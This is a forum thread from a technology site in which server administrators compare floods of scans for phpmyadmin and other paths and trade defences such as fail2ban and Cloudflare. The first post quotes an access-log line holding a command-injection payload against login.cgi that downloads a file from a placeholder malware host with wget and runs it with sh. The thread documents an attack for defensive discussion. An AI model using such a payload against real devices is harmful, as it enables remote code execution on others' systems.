Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.


biggal

467 posts

Ultimate Geek


#237757 16-Jun-2018 22:46
Send private message

getting over 1000's of hits looking for phpmyadmin on my servers and i don't have it installed

 

they coming from all different ipsand countries

 

 

 

{37.97.202.44 - - [16/Jun/2018:20:09:12 +1000] "HEAD http://xxxxxxxx:80/phpmyadmin/ HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

 

and

 

37.74.72.130 - - [16/Jun/2018:18:43:26 +1000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://malware_URL/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 301 682 "-" "Hello, World"





 

 

 


Create new topic
michaelmurfy
/dev/null
9633 posts

Uber Geek

Moderator
Trusted
Lifetime subscriber

  #2038900 16-Jun-2018 23:19
Send private message

I'm seeing 1000's too on the servers that have Apache / Nginx open to the world.

 

If you can, use Cloudflare and firewall the server off to Cloudflare only.





MadEngineer
2206 posts

Uber Geek

Trusted

  #2038908 17-Jun-2018 00:31
Send private message

GET /login.cgi?cli=aa%20aa%27;wget%20http://..............

 

https://www.exploit-db.com/exploits/44760/

 

 

 

 


 
 
 
 


muppet
2297 posts

Uber Geek

Trusted

  #2039133 17-Jun-2018 15:09
Send private message

I redirect all attempts to access phpmyadmin to random.php, a lovely script which just pipes /dev/urandom to the script accessing it.


Behodar
7168 posts

Uber Geek

Trusted
Lifetime subscriber

  #2039140 17-Jun-2018 15:28
Send private message

No requests for phpmyadmin on my site, but I do have a GET to a random file in /wp-admin (I'm not running WordPress) as well a GET for "up.php" and a HEAD for "configbak.php".

 

A bit pointless when I don't have PHP installed tongue-out


biggal

467 posts

Ultimate Geek


  #2039316 17-Jun-2018 23:40
Send private message

this is why i like ssl cause some of these attack scripts can not handle https

 

i use fail2ban to block them too

 

and no point of blocking by user agents cause they are easy to fake

 

eg curl -A "geekzone browser"

 

 





 

 

 


Create new topic





News »

Nanoleaf enhances lighting line with launch of Triangles and Mini Triangles
Posted 17-Oct-2020 20:18


Synology unveils DS16211+
Posted 17-Oct-2020 20:12


Ingram Micro introduces FootfallCam to New Zealand channel
Posted 17-Oct-2020 20:06


Dropbox adopts Virtual First working policy
Posted 17-Oct-2020 19:47


OPPO announces Reno4 Series 5G line-up in NZ
Posted 16-Oct-2020 08:52


Microsoft Highway to a Hundred expands to Asia Pacific
Posted 14-Oct-2020 09:34


Spark turns on 5G in Auckland
Posted 14-Oct-2020 09:29


AMD Launches AMD Ryzen 5000 Series Desktop Processors
Posted 9-Oct-2020 10:13


Teletrac Navman launches integrated multi-camera solution for transport and logistics industry
Posted 8-Oct-2020 10:57


Farmside hits 10,000 RBI customers
Posted 7-Oct-2020 15:32


NordVPN starts deploying colocated servers
Posted 7-Oct-2020 09:00


Google introduces Nest Wifi routers in New Zealand
Posted 7-Oct-2020 05:00


Orcon to bundle Google Nest Wifi router with new accounts
Posted 7-Oct-2020 05:00


Epay and Centrapay partner to create digital gift cards
Posted 2-Oct-2020 17:34


Inseego launches 5G MiFi M2000 mobile hotspot
Posted 2-Oct-2020 14:53









Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.


Support Geekzone »

Our community of supporters help make Geekzone possible. Click the button below to join them.

Support Geezone on PressPatron



Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.

Alternatively, you can receive a daily email with Geekzone updates.